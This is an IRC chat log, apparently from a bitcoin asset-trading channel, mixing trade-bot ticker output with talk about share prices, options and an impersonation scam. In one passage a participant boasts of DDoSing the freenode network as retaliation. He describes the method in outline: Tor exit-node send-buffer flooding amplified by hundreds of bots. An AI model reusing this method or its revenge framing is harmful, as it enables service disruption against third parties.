if I was to forward an educated guess, I'd say that it's MNW getting ready for an appearance on a korean TV show as the guess foreigner Aug 25 04:03:02 Well I wouldn't see a problem to that =/ Aug 25 04:03:10 [MPEX] [F.GIGA.ETF] 5300 @ 0.00098344 = 5.2122 BTC [-] Aug 25 04:08:15 [GLBSE] [FUTUREFUND] 200 @ 0.0001195 = 0.0239 BTC [+] Aug 25 04:13:14 evoorhees is gone! let's Party! Aug 25 04:13:31 lol Aug 25 04:16:25 O-O Aug 25 04:17:40 [MPEX] [S.BVPS] 189 @ 0.00340293 = 0.6432 BTC [-] Aug 25 04:20:21 i feel icky Aug 25 04:20:52 4k Aug 25 04:20:54 like i've take a breath from the other side of too nosey Aug 25 04:21:01 why do you feel icky ? Aug 25 04:21:21 [GLBSE] [PUREMINING] 15 @ 0.117999 = 1.77 BTC [-] Aug 25 04:21:22 as if i was looking into someone's personal finances Aug 25 04:21:41 lol. bitcoin. public transactions. Aug 25 04:21:47 can you see it tho ? Aug 25 04:21:52 yeah Aug 25 04:22:03 it's all fine in the abstract Aug 25 04:22:58 but when i can reasonably assume that a give tx is someone's, i dunno, it has a different emotional weight to it Aug 25 04:23:08 s/give/given/ Aug 25 04:23:59 silly emotions :P Aug 25 04:24:03 :p Aug 25 04:29:56 [GLBSE] [FOO.PPPPT] 1 @ 0.33 BTC [-] Aug 25 04:35:18 anywho, assbot fixed so it shouldnt be shipping a twit again Aug 25 04:35:26 off i go, nite Aug 25 04:35:38 skipping* Aug 25 04:35:52 lol at me i need assets Aug 25 04:36:00 dont have BTC Aug 25 04:36:09 [GLBSE] [YABMC] 1 @ 0.1289 BTC [+] Aug 25 04:36:43 kakobrekla: can u donate a few assets? Aug 25 04:37:08 Does someone want to try the 2factor auth on GLBSE Aug 25 04:37:26 I've changed the timing on it so it should be easier to use Aug 25 04:38:03 nefario: can you transfer a few assets? Aug 25 04:38:15 [GLBSE] [MMM] 1 @ 0.8 BTC [+] Aug 25 04:38:31 im stuck my rig is only 0.06BTC/24h Aug 25 04:39:07 [GLBSE] [PLATINUM] 75 @ 0.00999999 = 0.75 BTC [+] Aug 25 04:39:09 [GLBSE] [PLATINUM] 25 @ 0.01 = 0.25 BTC [+] Aug 25 04:39:46 nefario, i was able to log in fine with 2factor auth Aug 25 04:40:33 [GLBSE] [OBSI.HRPT] 2 @ 0.1095 = 0.219 BTC [+] Aug 25 04:41:18 [GLBSE] [BIB.PIRATE] 3 @ 0.55 = 1.65 BTC [+] Aug 25 04:41:20 [MPEX] [S.DICE] 5000 @ 0.0032 = 16 BTC [-] Aug 25 04:41:28 nefario, but withdrawal is delayed Aug 25 04:41:31 Was already working for me, except when GLBSE is slow Aug 25 04:42:15 [MPEX] [S.DICE] 12000 @ 0.0032 = 38.4 BTC [-] Aug 25 04:44:15 MadSweeney: should be processed soon Aug 25 04:44:30 [MPEX] [S.MPOE] 41500 @ 0.00038278 = 15.8854 BTC [-] Aug 25 04:44:30 [MPEX] [S.MPOE] 25500 @ 0.00038256 = 9.7553 BTC [-] Aug 25 04:44:32 [MPEX] [S.MPOE] 30200 @ 0.00038253 = 11.5524 BTC [-] Aug 25 04:44:33 btc-mining transfer me a few shares i wont waste the fund because i need this gsxr750 http://upload.wikimedia.org/wikipedia/commons/e/e2/2006_gsxr750.jpg "on9isrock" lol at myself Aug 25 04:44:33 [MPEX] [S.MPOE] 30600 @ 0.00038149 = 11.6736 BTC [-] Aug 25 04:44:34 [MPEX] [S.MPOE] 60100 @ 0.00038065 = 22.8771 BTC [-] Aug 25 04:44:35 [MPEX] [S.MPOE] 12100 @ 0.00038024 = 4.6009 BTC [-] Aug 25 04:45:09 nefario, thanks Aug 25 04:45:59 .////myself ignore Aug 25 04:48:10 Hey, go beg elsewhere =P Aug 25 04:54:18 [GLBSE] [NASTY] 1 @ 0.649 BTC [+] Aug 25 04:56:11 [GLBSE] [GSDPT] 10 @ 0.0045 = 0.045 BTC [+] Aug 25 04:56:20 i am over Aug 25 04:58:18 [GLBSE] [GSDPT] 940 @ 0.0045 = 4.23 BTC [+] Aug 25 04:59:55 lol people are speculating gsdpt i see Aug 25 05:00:27 why would anyone pay 45 ? Aug 25 05:00:42 hmm Aug 25 05:01:07 better: why would someone think it's worth .0045, 'cause i currently don't Aug 25 05:01:43 <_locust_> novelty effect Aug 25 05:01:48 [GLBSE] [GSDPT] 200 @ 0.0054 = 1.08 BTC [+] Aug 25 05:01:58 could be, it was a small amo... *drool* Aug 25 05:02:11 54? Aug 25 05:02:29 .py 54/45 Aug 25 05:02:30 1 Aug 25 05:02:30 lol srsly. Aug 25 05:02:32 [MPEX] [S.MPOE] 34721 @ 0.00038143 = 13.2436 BTC [+] Aug 25 05:02:32 <_locust_> those 1000 sold @ 45 were mine! Aug 25 05:02:35 .py 54/45.0 Aug 25 05:02:36 1.2 Aug 25 05:02:45 deadterra needs to show up. Aug 25 05:03:04 [GLBSE] [GSDPT] 90 @ 0.0058 = 0.522 BTC [+] Aug 25 05:03:07 [GLBSE] [DI.BFLSC.SUCCEED] 2 @ 0.001 = 0.002 BTC Aug 25 05:03:28 i clearly don't understand the world all that well Aug 25 05:03:53 .py 58/32.0 Aug 25 05:03:53 1.8125 Aug 25 05:04:04 [GLBSE] [FOO.PPPPT] 1 @ 0.33 BTC [-] Aug 25 05:04:18 not a bad gain, even if for .5btc Aug 25 05:04:18 [GLBSE] [GSDPT] 80 @ 0.0058 = 0.464 BTC [+] Aug 25 05:04:32 er, nearly 1 now Aug 25 05:04:59 <_locust_> bought 1000 @ 34 , sold @ 45... in 1 hour or so Aug 25 05:05:20 [GLBSE] [BIB.PIRATE] 1 @ 0.333 BTC [-] Aug 25 05:05:28 _locust_: thats good right? Aug 25 05:05:30 33% gain almost it seems Aug 25 05:05:37 oh thats DeaDTerra Aug 25 05:05:38 yeah Aug 25 05:05:40 <_locust_> yeah!!!! Aug 25 05:05:42 's pass through Aug 25 05:05:46 33% gain ON GLBSE Aug 25 05:05:54 I see :} Aug 25 05:05:55 he's awol lol Aug 25 05:06:44 thanks for that photo nefario Aug 25 05:06:48 oh lulz Aug 25 05:06:50 now if we see .0058 on mpex, i'll piss this couch Aug 25 05:06:53 you like it? Aug 25 05:07:07 MPEx is very good... just doesn't have an UI Aug 25 05:07:08 some random person posted it on reddit Aug 25 05:07:12 in a comment Aug 25 05:07:23 link? Aug 25 05:07:43 http://i.imgur.com/zvxAq.jpg Aug 25 05:07:51 http://i.imgur.com/zvxAq.jpg Aug 25 05:08:11 ack, my lastlog skillz arn't up to par Aug 25 05:08:17 I meant the reddit link? Aug 25 05:08:33 ah, nevermind Aug 25 05:08:34 is him merlin? Aug 25 05:08:35 just think its funny seeing matthew getting dressed before getting pimped out for the night Aug 25 05:08:43 merlin? Aug 25 05:09:16 Chaang-Noi: you should see me, i have much more hair to manage Aug 25 05:09:23 :) Aug 25 05:09:32 ;x Aug 25 05:10:32 http://2.bp.blogspot.com/-0B_aegagq5A/TY9eTqX8DLI/AAAAAAAAAg0/dKVWM2Gan7k/s1600/Colin-Morgan+%25281%2529.jpg http://i.imgur.com/zvxAq.jpg Aug 25 05:11:31 [GLBSE] [TYGRR.BOND-P] 2 @ 0.50020001 = 1.0004 BTC [+] Aug 25 05:11:32 [GLBSE] [TYGRR.BOND-P] 4 @ 0.50010001 = 2.0004 BTC [-] Aug 25 05:13:06 [GLBSE] [CBGB] 1 @ 0.5 BTC [+] Aug 25 05:13:13 o look who's here Aug 25 05:13:35 hey DeaDTerra Aug 25 05:13:42 dt, dt, there's action to be had! Aug 25 05:13:49 guys selling asicminer fot 0.03BTC Aug 25 05:14:00 No more asks fot GSDPT Aug 25 05:14:06 DeaDTerra GSDPT is sold out, put more asks Aug 25 05:14:08 only 2000 shares Aug 25 05:14:08 [GLBSE] [BLUECHIP] 65 @ 0.1 = 6.5 BTC Aug 25 05:14:09 [GLBSE] [FPGAMINING] 1 @ 0.9409 BTC [+] Aug 25 05:14:12 guys buying gsdpt at .0058 Aug 25 05:14:34 mmmmm, profit :D Aug 25 05:15:00 small, but true Aug 25 05:15:31 There's no ASICMINER for 0.03BTC? Aug 25 05:15:39 [GLBSE] [PPT.A] 3 @ 1.0799 = 3.2397 BTC [-] Aug 25 05:15:41 [GLBSE] [PPT.A] 2 @ 1.08 = 2.16 BTC [+] Aug 25 05:15:47 it was only a couple btc worth of gsdpt Aug 25 05:15:59 ppt is back over 1? Aug 25 05:16:03 since when? Aug 25 05:16:08 !ticker ppt.a Aug 25 05:16:10 !ticker ppt.a Aug 25 05:16:11 [GLBSE:PPT.A] [Bid: 0.1] [Ask: 1.08] [Spread: 0.98] [Last: 1.08] [24hVol: 5.3997] [7dAvg: 1.1026] Aug 25 05:16:13 [GLBSE:PPT.A] [Bid: 0.1] [Ask: 1.08] [Spread: 0.98] [Last: 1.08] [24hVol: 5.3997] [7dAvg: 1.1026] Aug 25 05:16:14 PPT never dropped under 1? Aug 25 05:16:23 it was .98 but thats it Aug 25 05:16:36 oh, it's insured-ish, isn't it Aug 25 05:16:40 that's the spread Aug 25 05:16:44 only for 0.32 BTC Aug 25 05:16:46 24hVol: 5.3997 Aug 25 05:16:51 it's irrelevant-ish i'd say Aug 25 05:16:57 [GLBSE] [GIGAMINING] 4 @ 0.984 = 3.936 BTC [+] Aug 25 05:17:44 ;;later tell assbot !ticker GSDPT Aug 25 05:17:45 The operation succeeded. Aug 25 05:17:46 [GLBSE] [FPGAMINING] 2 @ 0.941 = 1.882 BTC [+] Aug 25 05:17:49 [GLBSE] [GSDPT] 20 @ 0.0045 = 0.09 BTC [-] Aug 25 05:18:07 so someone in the s.dice thread was predicting larger volume in gsdpt than s.dice (i assume less the gsdpt volume on s.dice) Aug 25 05:18:28 did they bet ? Aug 25 05:18:45 no way, gsdpt had like only 50000 shares up for sale... Aug 25 05:18:45 that happened ‽ Aug 25 05:18:53 s,dice sold almost 2 million instantly Aug 25 05:19:05 !ticker S.DICE Aug 25 05:19:06 [MPEX:S.DICE] 1day: 0.0032 / 0.00320233 / 0.003232 (1414456 shares, 4,529.56 BTC), 30day: 0.0032 / 0.00320233 / 0.003232 (1414456 shares, 4,529.56 BTC) Aug 25 05:19:16 !ticker GSDPT Aug 25 05:19:17 [GLBSE:GSDPT] [Bid: 0.0045] [Ask: 0.0065] [Spread: 0.002] [Last: 0.0045] [24hVol: 166.656] [7dAvg: 0.0041] Aug 25 05:19:57 ja... Aug 25 05:20:04 that's less than 2 orders of magnitude, right? we should just give it to the guy Aug 25 05:20:06 They're already bidding 0.0045? Aug 25 05:20:32 at waht depth Aug 25 05:20:34 bots gotta bot Aug 25 05:20:51 370ish Aug 25 05:21:14 .py 370 * .0045 Aug 25 05:21:16 1.665 Aug 25 05:21:21 yeah, thought so Aug 25 05:21:30 If it's a bot, somebody programmed the thing... Aug 25 05:21:36 ^ Aug 25 05:21:54 my bots have only ever done what i wanted them to do Aug 25 05:22:07 'i' being a human being Aug 25 05:22:09 Yea, that's the point Aug 25 05:22:23 inc Aug 25 05:22:25 [GLBSE] [GSDPT] 30 @ 0.0045 = 0.135 BTC [-] Aug 25 05:22:26 [GLBSE] [GSDPT] 100 @ 0.0045 = 0.45 BTC [-] Aug 25 05:22:27 (dude, i'm just backing you up ;) Aug 25 05:22:49 a good sell there, imo Aug 25 05:23:01 easiest $6 i ever made Aug 25 05:23:26 let's say that was 1 minute of wortk Aug 25 05:23:30 [GLBSE] [PPT.DIV] 20 @ 0.1 = 2 BTC [-] Aug 25 05:23:51 isn't that about 360 anhour? Aug 25 05:23:59 not bad Aug 25 05:24:01 Who keeps buying ppt.div? Aug 25 05:24:33 0.6 BTC profit on 0.96 BTC invested, can I be the next pirate?!? :D Aug 25 05:24:40 [MPEX] [S.DICE] 1000 @ 0.0032 = 3.2 BTC [-] Aug 25 05:25:03 why does it count unchanged as a [-] Aug 25 05:25:23 trading sideways? Aug 25 05:25:36 [-] is down according to assbot Aug 25 05:25:50 is sideways Aug 25 05:26:40 oh Aug 25 05:26:47 it's down from the average Aug 25 05:26:49 There was some higher bids, so 0.0032 is lower Aug 25 05:26:53 what average, i don't know Aug 25 05:27:39 no one has yet needed to pay over 0.0032 :/ Aug 25 05:27:46 lmao Aug 25 05:27:54 why isn't DeaDTerra putting more out ? Aug 25 05:28:17 because he's not a magic man? Aug 25 05:28:21 smickles some peoplepaid more for top position i guess Aug 25 05:28:50 they only paid more inorder to not pay attention, i guess Aug 25 05:29:03 ya prolly didn't want to come home and discover they didn't fill. Aug 25 05:29:04 but still, that was only .0034 or so, right? Aug 25 05:29:17 o, no, ity was like 1% premium tops Aug 25 05:29:28 0.0032 / 0.00320233 / 0.003232 Aug 25 05:29:38 avg paid is actually 320233 Aug 25 05:29:55 in 'merica we say 'yeah, shit yeah' to that Aug 25 05:30:33 you know why we say that? Aug 25 05:30:56 i dunno Aug 25 05:31:15 [MPEX] [F.GIGA.ETF] 500 @ 0.00098344 = 0.4917 BTC [-] Aug 25 05:31:15 most of us don't know what we're doing any way Aug 25 05:31:16 [MPEX] [F.GIGA.ETF] 10900 @ 0.00097697 = 10.649 BTC [-] Aug 25 05:31:43 hey mircea_popescu, that candide is a decent read Aug 25 05:31:48 yw. Aug 25 05:31:56 i haven't finished yet tho Aug 25 05:32:30 but my 9 mo. old daughter practically dances to me reading it to her like it's disco in the 70's Aug 25 05:32:35 :) Aug 25 05:32:42 i was gonna say, it's great for a read for kids. Aug 25 05:34:21 heh, i dunno french but for a toads anus in pittsburg, so can you tell me if candide is related to http://en.wikipedia.org/wiki/Candida_(genus) Aug 25 05:34:53 ( i mean the word/name, that is) Aug 25 05:35:30 tis not. Aug 25 05:35:40 other than in the sense candidate is connected to both of them Aug 25 05:36:11 candens, candeo is latin for glimmer, shine Aug 25 05:36:18 [MPEX] [O.HASH.C10TH] 150000 @ 0.00000025 = 0.0375 BTC [-] Aug 25 05:36:19 [MPEX] [O.HASH.C10TH] 150000 @ 0.00000032 = 0.048 BTC [+] Aug 25 05:36:21 thus, in the sense of purity, it yields candour, and so Candide. Aug 25 05:36:25 hey smickles Aug 25 05:36:28 in the sense of whiteness, the name of the fungus Aug 25 05:36:32 just a sec Aug 25 05:36:32 see, that makes more sence Aug 25 05:36:35 *sense Aug 25 05:36:39 hctib: yes? Aug 25 05:36:48 and in the sense of chalkening (of the togas), an ancient tradition, the word for candidate. Aug 25 05:37:37 hello Aug 25 05:37:46 howdy :D Aug 25 05:38:44 mircea_popescu: spoil one thing for me, does candide ever come around to the idea that perpetual optimism isn't such a good thing? Aug 25 05:38:53 yes. Aug 25 05:38:57 does anyone want to explain to me how puts work on mpex? Aug 25 05:39:02 sure. Aug 25 05:39:04 [GLBSE] [GSDPT] 344 @ 0.0045 = 1.548 BTC [-] Aug 25 05:39:12 a put is the right to sell btc art the specified price, the strike. Aug 25 05:39:20 [GLBSE] [FPGAMINING] 4 @ 0.9001 = 3.6004 BTC [-] Aug 25 05:39:21 [GLBSE] [FPGAMINING] 8 @ 0.9 = 7.2 BTC [-] Aug 25 05:39:22 so if you own P100 you can sell btc at 10 Aug 25 05:39:31 how does one write puts? Aug 25 05:40:15 mkopt Aug 25 05:40:17 what payment is the "sell at 10" in? PPUSD MTGOXUSD Aug 25 05:40:18 there's a special order for that, you first need to create the put Aug 25 05:40:27 rothgar : bitcoins. Aug 25 05:41:10 Say I exercise the put at 10 when bitcoin is trading at 8 what happens? Aug 25 05:41:29 you get 2 / 8 = .25 btc per put. Aug 25 05:43:25 ok, I wondered how the FRNs work into it. They don't Aug 25 05:43:36 FRN = ? Aug 25 05:43:53 Federal Reserve Note = USD Aug 25 05:43:54 o, the fiat ? does not. mpex is entirely btc based. Aug 25 05:44:18 [22:17] 2000 shares for 0.03? Aug 25 05:44:18 [22:19] my shares and i dont want profits Aug 25 05:44:18 [22:20] So you're selling 2000 for 0.03 you say hmm? Aug 25 05:44:18 [22:20] limited time Aug 25 05:44:18 [22:20] Why so low? Aug 25 05:44:18 [22:20] I'll take them I guess Aug 25 05:44:18 [22:21] im not taking any profit Aug 25 05:44:19 [22:23] good if you taking them Aug 25 05:44:19 [22:23] too much profit for me Aug 25 05:44:20 [22:24] I never heard of such a thing as too much profit Aug 25 05:44:20 [22:24] Taking them Aug 25 05:44:21 [22:27] Want to trade them now? Aug 25 05:44:21 [22:32] please send to 1ARYy8FLegMYLSfFdGZ4Vo2UXPMBU1AnAe and give me your username Aug 25 05:44:22 [22:33] Eh, mind at least authing on the otc so I know it's really you? Aug 25 05:44:31 ;;seen nefario Aug 25 05:44:31 nefario was last seen in #bitcoin-assets 36 minutes and 47 seconds ago: http://i.imgur.com/zvxAq.jpg Aug 25 05:44:39 We need like gribble + gpg authing in here now it seems Aug 25 05:44:57 I have a feeling I am not going to see my IPO for awhile. Aug 25 05:45:11 fake DeaDTerra ? Aug 25 05:45:24 aye Aug 25 05:45:26 no wai Aug 25 05:45:34 good catch Aug 25 05:45:44 smickles me too. Aug 25 05:45:47 If we could login in here, would help Aug 25 05:45:53 I suppose Aug 25 05:45:58 course we can login duh Aug 25 05:46:03 ;;eauth mircea_popescu Aug 25 05:46:04 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@trilema/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Aug 25 05:46:13 nefario: Tell me when you reject/approve my IPO. Thanks. Aug 25 05:46:14 BTC-Mining: you mean, the little + to our nicks? Aug 25 05:46:20 oh, gribble is already in here Aug 25 05:46:32 ;;ident Aug 25 05:46:33 You are identified as user smickles, with GPG key id EA62D7CEB2450C3F, key fingerprint 96ACCA7C3B09EC61B0A6D7F9EA62D7CEB2450C3F, and bitcoin address 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Aug 25 05:46:39 :> Aug 25 05:46:49 ;;voiceme Aug 25 05:46:55 i'm bonafide Aug 25 05:47:08 eh Aug 25 05:47:11 ;;ident Aug 25 05:47:12 You are not identified. Aug 25 05:47:16 does DeaDTerra not have the freenode nick protection? Aug 25 05:47:23 I'm not bonafide :( Aug 25 05:47:27 'cause that's bad if he does Aug 25 05:47:38 [MPEX] [O.BTCUSD.C090T] 620 @ 0.12403214 = 76.8999 BTC [-] Aug 25 05:47:39 [MPEX] [F.GIGA.ETF] 8800 @ 0.00097697 = 8.5973 BTC [-] Aug 25 05:47:40 ;;identify Rothgar Aug 25 05:47:40 Error: That operation cannot be done in a channel. Aug 25 05:47:40 [MPEX] [F.GIGA.ETF] 4221 @ 0.00097684 = 4.1232 BTC [-] Aug 25 05:47:53 ;;eauth Rothgar Aug 25 05:47:54 Request successful for user Rothgar, hostmask Rothgar!d8aac070@gateway/web/freenode/ip.216.170.192.112. Get your encrypted OTP from http://bitcoin-otc.com/otps/4FB28DD8EA18EA0A Aug 25 05:47:54 it's "ident" Aug 25 05:48:06 [MPEX] [O.BTCUSD.C100T] 315 @ 0.06132533 = 19.3175 BTC [+] Aug 25 05:48:25 (that is , it's ident if you have already authed) Aug 25 05:48:47 !ticker O.BTCUSD.C100T Aug 25 05:48:49 [MPEX:O.BTCUSD.C100T] 1day: 0.05418994 / 0.05622657 / 0.06132533 (1115 shares, 62.69 BTC), 30day: 0.03939127 / 0.11498062 / 0.31160906 (7192 shares, 826.94 BTC) Aug 25 05:48:56 Looks like not Aug 25 05:49:04 that's so silly. Aug 25 05:49:06 I use the freenode nick protection Aug 25 05:49:20 i have it on a couple of nicks Aug 25 05:49:28 ;;later nefario check your IPOs. Aug 25 05:49:29 Error: The "Later" plugin is loaded, but there is no command named "nefario" in it. Try "list Later" to see the commands in the "Later" plugin. Aug 25 05:49:34 ;;ident Aug 25 05:49:34 You are identified as user Rothgar, with GPG key id 4FB28DD8EA18EA0A, key fingerprint 4BF10B4D89E0A466BA83328D4FB28DD8EA18EA0A, and bitcoin address None Aug 25 05:49:36 later tell. Aug 25 05:49:38 later tell, Aug 25 05:49:45 ha Aug 25 05:49:47 I'm bonefied :) :) Aug 25 05:49:54 :D Aug 25 05:49:59 \o/ Aug 25 05:49:59 ;;later tell nefario check your IPOs. I ordered one 3 or so days ago. Thanks. Aug 25 05:49:59 The operation succeeded. Aug 25 05:50:44 ;;voiceme only works in -otc as far as i know Aug 25 05:50:44 (voiceme takes no arguments) -- Gives you voice on #bitcoin-otc if you qualify. Aug 25 05:50:58 ;;voiceme Aug 25 05:51:13 it worked Aug 25 05:51:22 cross chanel? Aug 25 05:51:27 yep Aug 25 05:51:33 interesting Aug 25 05:51:48 he just needs to hear it and for you to be there Aug 25 05:51:54 i wonder if that alludes to a venerability Aug 25 05:52:10 since you can do it in pm i dun see why Aug 25 05:52:18 good point Aug 25 05:52:25 I don't see any venerability Aug 25 05:52:45 i vaugely recall seing that part of the code anyway Aug 25 05:52:54 iirc, it's very specific Aug 25 05:53:00 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.06139656 = 61.3966 BTC [-] Aug 25 05:54:48 so basically , someone has hacked an account with asicminer in it Aug 25 05:54:56 be on the lookout peeps Aug 25 05:55:19 don't tell me ?! session stolen ? Aug 25 05:55:32 or just a bad pw Aug 25 05:55:42 smickles, no..... Aug 25 05:55:52 it only takes a day at THE MOST to crack an 8 character pw Aug 25 05:56:03 oh Aug 25 05:56:16 BTC-Mining: that's what i took from your past Aug 25 05:56:17 e Aug 25 05:56:21 [GLBSE] [PPT.A] 4 @ 1.04 = 4.16 BTC [-] Aug 25 05:56:24 Someone just pretends to be DeaDTerra and sell his shares... he wants funds sent first to a BTC address Aug 25 05:56:34 I don't think he has access to any account Aug 25 05:56:35 oooooooohhhhhh Aug 25 05:56:46 oh lol Aug 25 05:56:54 i was wondering why it was so low Aug 25 05:56:57 Just that DeaDTerra has not made an account on freenode to block users to use his password Aug 25 05:57:09 to use his username* Aug 25 05:57:42 silly, that. Aug 25 05:57:44 yeah that sucks Aug 25 05:57:48 iv been scared of that myslef Aug 25 05:58:01 but then again, i never send first, lol Aug 25 05:58:07 unless its to a glbse account with a name i know Aug 25 05:58:15 I don't mind sending first... Aug 25 05:58:27 if the person is gpg authed in the otc and I know that person Aug 25 05:58:32 as trustable Aug 25 05:58:46 but I'd expect to send to the guy's GLBSE account first Aug 25 06:00:04 BTC-Mining: does deadterra even know freenode has a nickserv? Aug 25 06:00:05 does the btc faucet still exist ? Aug 25 06:00:33 [MPEX] [O.BTCUSD.P120T] 1 @ 0.22413738 BTC [-] Aug 25 06:00:48 [GLBSE] [THUNDERCM.MIF.SHARES] 5 @ 0.4207 = 2.1035 BTC [-] Aug 25 06:02:08 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.06082057 = 60.8206 BTC [-] Aug 25 06:02:58 ;;ticker Aug 25 06:02:58 Best bid: 10.26058, Best ask: 10.38623, Bid-ask spread: 0.12565, Last trade: 10.26058, 24 hour volume: 102761, 24 hour low: 9.852, 24 hour high: 10.62611 Aug 25 06:03:19 I don't know, Diablo-D3 Aug 25 06:04:03 many irc users dont even know there IS a nickser Aug 25 06:04:04 *serv Aug 25 06:04:12 let alone that some networks dont have one Aug 25 06:05:02 A year ago someone was messing with my nick. I had to register it. Aug 25 06:05:33 a year and 19 weeks ago Aug 25 06:08:40 Rothgar: man thats nothing Aug 25 06:09:13 I was one of the first nicks registered on freenode (which wasnt even called freenode at the time)... Aug 25 06:09:23 and lilo, the founder of the network, deregistered my nick Aug 25 06:09:41 wow Aug 25 06:09:51 he didnt like the fact I exposed his non-profit fraud Aug 25 06:09:55 I see 5 or 6 years wow Aug 25 06:10:44 yeah I ended up reregistering it after he died Aug 25 06:10:52 links ? Aug 25 06:10:56 Ohh Aug 25 06:10:58 mircea_popescu: for what Aug 25 06:11:11 well this story. Aug 25 06:11:13 Rothgar: freenode used to be called opn and used to be called linpeople before that Aug 25 06:11:21 mircea_popescu: huh? Aug 25 06:11:27 lilo dereged your name ? Aug 25 06:11:34 mircea_popescu: why would there be a link? Aug 25 06:11:45 sounds like a dramaworthy thing Aug 25 06:11:53 oh fuck Aug 25 06:11:56 oh, it was quite full of drama, no doubt about that Aug 25 06:11:59 S.DICE didn't sell out? Aug 25 06:12:05 bitfoo not yet. Aug 25 06:12:09 mircea_popescu: the fun part is when I used tor to take down the network :D Aug 25 06:12:10 ok Aug 25 06:12:16 tor ?! Aug 25 06:12:19 ahh, to be young again Aug 25 06:12:28 are you nuts tor is recent lol Aug 25 06:12:30 mircea_popescu: yeah, I used an unpatched bug to use tor nodes to repeat an attack Aug 25 06:12:42 yes, this was about 6 or 7 years ago Aug 25 06:12:46 bitfoo no Aug 25 06:12:58 freenode dates back to 1994 or 1995 iirc Aug 25 06:12:59 yeah, I kinda expected it to Aug 25 06:13:08 mircea_popescu: 1994 Aug 25 06:13:12 tor is from like 2003 ? Aug 25 06:13:14 but it was called linpeople at the time Aug 25 06:13:16 [MPEX] [F.GIGA.ETF] 7507 @ 0.00098641 = 7.405 BTC [+] Aug 25 06:13:17 [MPEX] [F.GIGA.ETF] 6012 @ 0.00099573 = 5.9863 BTC [+] Aug 25 06:13:18 [MPEX] [F.GIGA.ETF] 2500 @ 0.00099696 = 2.4924 BTC [+] Aug 25 06:13:24 mircea_popescu: he didnt start this shit until about 6 years ago Aug 25 06:13:33 where he was using his non-proift to steal money from users Aug 25 06:13:46 bitfoo there's about 150k of demand at GLBSE https://glbse.com/asset/view/GSDPT Aug 25 06:13:46 levin died i think 6 yearsa ago Aug 25 06:13:49 I exposed it, he had a problem with it, so I had a problem with the network remaining to be up Aug 25 06:13:50 wasn't it 2006 ? Aug 25 06:14:20 Rothgar, so why doesn't DeadTerra just arbitrage that out? Aug 25 06:14:25 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.06077014 = 60.7701 BTC [-] Aug 25 06:14:27 bitfoo he's awol. Aug 25 06:14:29 lilo died in september of 2006 Aug 25 06:14:33 ah Aug 25 06:14:39 I don't know, maybe sleeping ? Aug 25 06:14:48 mircea_popescu: so, what happened is, I could max out the tcp send buffer on the tor end point Aug 25 06:15:00 and then disconnect, and the tor node would still flush the buffer Aug 25 06:15:08 ouch Aug 25 06:15:15 so I could rapidly connect, flood, and disconnect, without seeing most of the spam repeated to me Aug 25 06:15:24 then I just put a few hundred bots in popular channels Aug 25 06:15:26 like #gentoo Aug 25 06:15:36 and #gentoo is about as big now as it was then Aug 25 06:15:47 so the network would amplify the attack Aug 25 06:15:48 pity the software is about as sucky :D Aug 25 06:16:00 I turned 768/128 dsl into a 100mbps attack. Aug 25 06:16:05 tor fixed the bug shortly after Aug 25 06:16:40 but it did what it needed to, lilo had to admit to stealing from the users Aug 25 06:16:51 i never heard of htis. Aug 25 06:17:03 it was never really documented Aug 25 06:18:48 then some random mexican in a stolen car ran him over Aug 25 06:18:51 which made the entire thing moot Aug 25 06:19:30 so the moral is not to get run over ? Aug 25 06:19:35 wow, i haven't heard from lilo in years. and he died?! :( Aug 25 06:19:59 mod6: yup, died Aug 25 06:20:19 although, the hilarity is Aug 25 06:20:23 people tried to blame nenolod for it Aug 25 06:21:09 im still kinda blown away by all that. i had no idea. Aug 25 06:21:40 [MPEX] [O.BTCUSD.P100T] 1000 @ 0.06072477 = 60.7248 BTC [-] Aug 25 06:22:09 christel is now running the show Aug 25 06:22:25 and lilo's brother has been helping out periodically Aug 25 06:22:46 (whos some rich lawyer dude, lilo was the black sheep of his family) Aug 25 06:23:03 ole' lilo` Aug 25 06:24:07 anyway, thx for filling me in Diablo-D3 Aug 25 06:24:56 ;;ticker Aug 25 06:24:57 Best bid: 10.23179, Best ask: 10.349, Bid-ask spread: 0.11721, Last trade: 10.349, 24 hour volume: 102047, 24 hour low: 9.852, 24 hour high: 10.62611 Aug 25 06:25:53 Indeed Aug 25 06:25:55 I kinda miss him Aug 25 06:25:58 but I sorta dont Aug 25 06:26:07 @Rothgar Aug 25 06:26:11 I mean, I offered to help him dig himself out of the hole he put himself in Aug 25 06:26:14 and he said no Aug 25 06:26:26 so freenode decided that it would be ddossed for a few days. Aug 25 06:27:42 I wasn't aware of any of that stuff I guess. :/ Aug 25 06:29:13 mod6 exactly what i said. Aug 25 06:29:27 [GLBSE] [GSDPT] 290 @ 0.0035 = 1.015 BTC [-] Aug 25 06:30:06 whoa Aug 25 06:30:07 http://www.theregister.co.uk/2003/01/29/buy_a_piece_of_net/ Aug 25 06:30:09 it IS documented. Aug 25 06:31:18 mircea_popescu: so it is Aug 25 06:31:24 but not all of it Aug 25 06:31:28 oh wow. i feel like i read that article in a different life. Aug 25 06:33:46 now i'm recalling him asking for donations and stuff, this is coming back to me. Aug 25 06:33:59 wtf Aug 25 06:34:09 bummer man :( Aug 25 06:34:15 i had buy orders in over night, they're suddenly gone Aug 25 06:34:25 were they filled? Aug 25 06:34:50 nope Aug 25 06:34:52 just deleted Aug 25 06:34:59 they would have been filled Aug 25 06:35:03 which means I lost out Aug 25 06:35:05 dammit Aug 25 06:35:20 All buy orders were wiped Aug 25 06:35:20 all of my buys were gone Aug 25 06:35:23 [MPEX] [S.MPOE] 26566 @ 0.00038047 = 10.1076 BTC [-] Aug 25 06:35:28 why? Aug 25 06:35:34 Platform update Aug 25 06:35:40 oh GLBSE? Aug 25 06:35:48 [GLBSE] [ASICMINER] 13 @ 0.0899 = 1.1687 BTC [-] Aug 25 06:35:50 i somehow knew this was coming. Aug 25 06:36:17 everyone did.... there was a forum thread about it Aug 25 06:36:36 I knew there'd be an update removing the reserve requirement Aug 25 06:36:54 so I guess it's worth it, if that's what happened Aug 25 06:37:09 hmmm... no Aug 25 06:37:18 my available still went down placing new bids Aug 25 06:37:42 Nef had to roll back Aug 25 06:37:44 [MPEX] [S.DICE] 1000 @ 0.0032 = 3.2 BTC [-] Aug 25 06:38:23 I see Aug 25 06:40:09 